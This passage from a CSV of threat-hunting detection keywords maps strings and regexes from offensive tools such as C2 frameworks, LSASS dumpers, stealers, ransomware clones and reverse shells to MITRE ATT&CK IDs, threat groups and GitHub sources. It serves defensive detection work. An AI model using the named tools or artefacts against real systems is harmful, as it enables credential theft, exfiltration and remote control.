- Inject ETW Bypass into Remote Process via Syscalls (HellsGate|HalosGate)","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon 
Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/boku7/injectEtwBypass","1","1","N/A","N/A","10","10","279","55","2021-09-28T19:09:38Z","2021-09-21T23:06:42Z","38975" "*crcreditcards.txt*",".{0,1000}crcreditcards\.txt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","38976" "*crde dns -*",".{0,1000}crde\sdns\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","38977" "*crde https -*",".{0,1000}crde\shttps\s\-.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","38978" "*crde::utils::checker*",".{0,1000}crde\:\:utils\:\:checker.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data 
Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","38979" "*crde_x64.exe dns -f *",".{0,1000}crde_x64\.exe\sdns\s\-f\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","38980" "*crde_x64.exe https -f *",".{0,1000}crde_x64\.exe\shttps\s\-f\s.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","38981" "*creaktive/tsh*",".{0,1000}creaktive\/tsh.{0,1000}","offensive_tool_keyword","tsh","UNIX backdoor","T1103 - T1105 - T1160 - T1189 - T1496 - T1102","TA0003 - TA0005 - TA0011","N/A","N/A","Persistence","https://github.com/creaktive/tsh","1","1","#linux","N/A","10","6","568","130","2024-02-20T18:07:08Z","2011-05-14T19:15:00Z","38982" "*CrealPasswords.txt*",".{0,1000}CrealPasswords\.txt.{0,1000}","offensive_tool_keyword","cstealer","NiceRAT stealer - clone of cstealer","T1056.001 - T1560.001 - T1564.004 - T1113 - T1003 - T1036 - T1555.003 - T1555.001 - T1213.002 - T1027.002","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/0x00G/NiceRAT","1","0","N/A","N/A","10","2","118","86","2024-10-20T18:38:53Z","2022-11-20T19:11:00Z","38983" "*Create %d 
IP@Loginl;Password*",".{0,1000}Create\s\%d\sIP\@Loginl\;Password.{0,1000}","offensive_tool_keyword","DUBrute","RDP Bruteforcer","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ch0sys/DUBrute","1","0","N/A","N/A","10","1","37","28","2018-02-19T13:03:14Z","2017-06-15T08:55:46Z","38984" "*Create a raw socket to listen for ICMP packets cause f scappy we don't need that shit*",".{0,1000}Create\sa\sraw\ssocket\sto\slisten\sfor\sICMP\spackets\scause\sf\sscappy\swe\sdon\'t\sneed\sthat\sshit.{0,1000}","offensive_tool_keyword","PILOT","Pilot is a simplified system designed for the stealthy transfer of files across networks using ICMP","T1048.001 - T1573.001 - T1020","TA0010 - TA0002 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/dahvidschloss/PILOT","1","0","N/A","N/A","9","1","79","7","2024-04-16T18:24:44Z","2024-04-03T15:04:33Z","38985" "*CREATE DATABASE C2;*",".{0,1000}CREATE\sDATABASE\sC2\;.{0,1000}","offensive_tool_keyword","golang_c2","C2 written in Go for red teams aka gorfice2k","T1071 - T1021 - T1090","TA0011 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/m00zh33/golang_c2","1","0","N/A","N/A","10","10","6","8","2019-03-18T00:46:41Z","2019-03-19T02:39:59Z","38986" "*CREATE DATABASE homados*",".{0,1000}CREATE\sDATABASE\shomados.{0,1000}","offensive_tool_keyword","MetasploitCoop","Post-exploitation collaboration platform based on MSF","T1105 - T1098 - T1104 - T1136","TA0010 - TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x727/MetasploitCoop-Backend","1","0","N/A","N/A","10","10","37","8","2021-08-17T10:26:17Z","2021-08-17T07:52:12Z","38987" "*CREATE DATABASE jasmin_db*",".{0,1000}CREATE\sDATABASE\sjasmin_db.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 
TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","38988" "*Create SSL certificate (FruityC2)*",".{0,1000}Create\sSSL\scertificate\s\(FruityC2\).{0,1000}","offensive_tool_keyword","FruityC2","FruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","0","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","38989" "*CREATE TABLE [LDAPHUNTERFINDINGS]*",".{0,1000}CREATE\sTABLE\s\[LDAPHUNTERFINDINGS\].{0,1000}","offensive_tool_keyword","LDAP-Password-Hunter","LDAP Password Hunter is a tool which wraps features of getTGT.py (Impacket) and ldapsearch in order to look up for password stored in LDAP database","T1558.003 - T1003.003 - T1078.003 - T1212","TA0006 - TA0007 - TA0003","N/A","N/A","Credential Access","https://github.com/oldboy21/LDAP-Password-Hunter","1","0","N/A","N/A","10","2","198","25","2023-01-06T15:32:34Z","2021-07-26T14:27:01Z","38990" "*create_awl_payload(*",".{0,1000}create_awl_payload\(.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","38991" "*create_com_stager(*",".{0,1000}create_com_stager\(.{0,1000}","offensive_tool_keyword","SharpShooter","Payload Generation Framework","T1027 - T1059","TA0042","N/A","N/A","Resource Development","https://github.com/mdsecactivebreach/SharpShooter","1","0","N/A","N/A","10","10","1859","361","2024-08-21T12:09:54Z","2018-03-06T20:04:20Z","38992" 
"*create_dummy_dll_file*",".{0,1000}create_dummy_dll_file.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","38993" "*create_nemesis_db(*",".{0,1000}create_nemesis_db\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","38994" "*create_nemesis_db_pool(*",".{0,1000}create_nemesis_db_pool\(.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","38995" "*create_protected_process_as_user*",".{0,1000}create_protected_process_as_user.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. 
A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","38996" "*Create-ADelegReport*",".{0,1000}Create\-ADelegReport.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","0","N/A","N/A","6","2","179","18","2024-09-18T20:21:42Z","2024-03-04T03:44:52Z","38997" "*CreateAssignTokenVariant.exe*",".{0,1000}CreateAssignTokenVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","38998" "*create-aws-instance.py*",".{0,1000}create\-aws\-instance\.py.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1024 - T1071 - T1029 - T1569","TA0002 - TA0003 - TA0040","N/A","Black Basta","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","N/A","10","10","806","170","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z","38999" "*CreateC2Dialog.*",".{0,1000}CreateC2Dialog\..{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1105 - T1573 - T1071 - T1027","TA0011 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","0","N/A","N/A","10","10","996","130","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z","39000" "*CreateC2Server*",".{0,1000}CreateC2Server.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT 
developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","39001" "*Created by Usman Sikander (a.k.a offensive-panda)*",".{0,1000}Created\sby\sUsman\sSikander\s\(a\.k\.a\soffensive\-panda\).{0,1000}","offensive_tool_keyword","ShadowDumper","dump LSASS memory","T1003.001 - T1055","TA0006 ","N/A","N/A","Credential Access","https://github.com/Offensive-Panda/ShadowDumper","1","0","#content","N/A","10","6","521","83","2025-04-05T08:32:28Z","2024-11-10T15:26:28Z","39002" "*Created directory for PME at *",".{0,1000}Created\sdirectory\sfor\sPME\sat\s.{0,1000}","offensive_tool_keyword","PSMapExec","A PowerShell tool heavily inspired by the popular tool CrackMapExec. Far too often I find myself on engagements without access to Linux in order to make use of CrackMapExec.","T1059.001 - T1021.006 - T1110.001 - T1021.001 - T1021.004 - T1021.005 - T1021.003 - T1621","TA0002 - TA0011 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation tool","https://github.com/The-Viper-One/PsMapExec","1","0","N/A","N/A","10","10","954","108","2025-03-11T14:38:50Z","2023-06-20T16:57:27Z","39003" "*createdaisypayload*",".{0,1000}createdaisypayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39004" "*CreateFile(""twin.txt""*",".{0,1000}CreateFile\(\""twin\.txt\"".{0,1000}","offensive_tool_keyword","EvilLsassTwin","Dumping lsass","T1003 - T1560.001 - T1022 - T1027.002","TA0005 - TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/RePRGM/Nimperiments/tree/main/EvilLsassTwin","1","0","N/A","N/A","10","2","151","18","2024-12-23T05:06:31Z","2022-09-13T12:42:13Z","39005" "*CreateFile(L""\\\\.\\EchoDrv*",".{0,1000}CreateFile\(L\""\\\\\\\\\.\\\\EchoDrv.{0,1000}","offensive_tool_keyword","RealBlindingEDR","AV/EDR evasion","T1562.001 - T1548.001","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/myzxcg/RealBlindingEDR","1","0","N/A","N/A","10","10","1050","190","2024-06-21T03:16:55Z","2023-10-28T07:06:53Z","39006" "*Create-HotKeyLNK.json*",".{0,1000}Create\-HotKeyLNK\.json.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin","1","1","N/A","N/A","10","10","5221","826","2025-04-17T15:08:42Z","2017-01-06T11:18:20Z","39007" "*CreateImpersonateTokenVariant.exe*",".{0,1000}CreateImpersonateTokenVariant\.exe.{0,1000}","offensive_tool_keyword","PrivFu","get SYSTEM integrity level by abusing arbitrary kernel write vulnerability and token privileges","T1068 - T1134 - T1134.001 - T1078 - T1059","TA0004 - TA0009 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","KernelWritePoCs","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","39008" "*createlinuxpayload*",".{0,1000}createlinuxpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to 
aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","#linux","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39009" "*Create-MultipleSessions.ps1*",".{0,1000}Create\-MultipleSessions\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","39010" "*Create-NamedPipe*",".{0,1000}Create\-NamedPipe.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","39011" "*createnewpayload*",".{0,1000}createnewpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - 
TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39012" "*createnewshellcode*",".{0,1000}createnewshellcode.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39013" "*CreateObject(""""W""""+""""S""""+""""cr""""+""""ip""""+""""t.""""+""""S""""+""""h""""+""""e""""+""""l""""+""""l""""*",".{0,1000}CreateObject\(\""W\""\+\""S\""\+\""cr\""\+\""ip\""\+\""t\.\""\+\""S\""\+\""h\""\+\""e\""\+\""l\""\+\""l\"".{0,1000}","offensive_tool_keyword","Payload-Download-Cradles","download cradles to bypass AV/EPP/EDR in context of download cradle detections","T1105 - T1027 - T1203 - T1071","TA0005 - TA0009 - TA0002","N/A","N/A","Defense Evasion","https://github.com/VirtualAlllocEx/Payload-Download-Cradles","1","0","N/A","N/A","10","3","256","51","2022-07-07T07:20:36Z","2021-05-14T08:56:54Z","39014" "*createpbindpayload*",".{0,1000}createpbindpayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - 
T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39015" "*createproxypayload -*",".{0,1000}createproxypayload\s\-.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39016" "*createproxypayload*",".{0,1000}createproxypayload.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - 
Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","39017" "*CreatePseudoConsole function found! Spawning a fully interactive shell*",".{0,1000}CreatePseudoConsole\sfunction\sfound!\sSpawning\sa\sfully\sinteractive\sshell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","39018" "*CreatePseudoConsole function not found! Spawning a netcat-like interactive shell*",".{0,1000}CreatePseudoConsole\sfunction\snot\sfound!\sSpawning\sa\snetcat\-like\sinteractive\sshell.{0,1000}","offensive_tool_keyword","ConPtyShell","ConPtyShell - Fully Interactive Reverse Shell for Windows","T1059.001 - T1021.004 - T1056.003","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antonioCoco/ConPtyShell","1","0","N/A","N/A","10","10","1102","171","2023-01-20T10:52:52Z","2019-09-13T22:11:18Z","39019" "*Create-SQLFileCLRDll*",".{0,1000}Create\-SQLFileCLRDll.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. 
PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","39020" "*Create-SQLFileXpDll*",".{0,1000}Create\-SQLFileXpDll.{0,1000}","offensive_tool_keyword","PowerUpSQL","PowerUpSQL includes functions that support SQL Server discovery. weak configuration auditing. privilege escalation on scale. and post exploitation actions such as OS command execution. It is intended to be used during internal penetration tests and red team engagements. However. PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","39021" "*CreateStringPayload(""RULER"")*",".{0,1000}CreateStringPayload\(\""RULER\""\).{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","0","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","39022" "*Create-SuspendedWinLogon*",".{0,1000}Create\-SuspendedWinLogon.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider 